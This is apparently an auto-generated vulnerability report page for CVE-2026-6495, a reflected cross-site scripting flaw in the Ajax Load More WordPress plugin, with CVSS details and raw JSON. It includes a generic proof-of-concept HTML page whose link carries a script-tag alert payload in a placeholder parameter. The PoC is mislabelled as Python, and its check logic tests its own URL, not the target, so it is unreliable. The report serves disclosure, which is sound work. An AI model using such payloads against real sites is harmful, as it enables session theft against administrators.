Security Vulnerability Report
中文
CVE-2026-6495 CVSS 7.1 HIGH

CVE-2026-6495

Published: 2026-05-18 07:16:13
Last Modified: 2026-05-18 17:05:46

Description

The Ajax Load More WordPress plugin before 7.8.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Ajax Load More < 7.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- // PoC for CVE-2026-6495 // Note: The specific parameter name depends on the plugin configuration, usually found in the shortcode or query string. --> <html> <body> <h3>Ajax Load More XSS PoC</h3> <p>Click the link below to trigger the vulnerability (Simulated):</p> <a href="http://target-wordpress-site.com/?vulnerable_param="><script>alert('CVE-2026-6495')</script>">Exploit Link</a> <script> // Automated verification logic (if the script is reflected) var urlParams = new URLSearchParams(window.location.search); var payload = urlParams.get('vulnerable_param'); if(payload && payload.includes('alert')) { console.log('Vulnerable parameter reflected successfully.'); } </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6495", "sourceIdentifier": "[email protected]", "published": "2026-05-18T07:16:12.820", "lastModified": "2026-05-18T17:05:46.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Ajax Load More WordPress plugin before 7.8.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://wpscan.com/vulnerability/c52f28c5-547d-48ae-89dd-edcdaeadcec5/", "source": "[email protected]"}]}}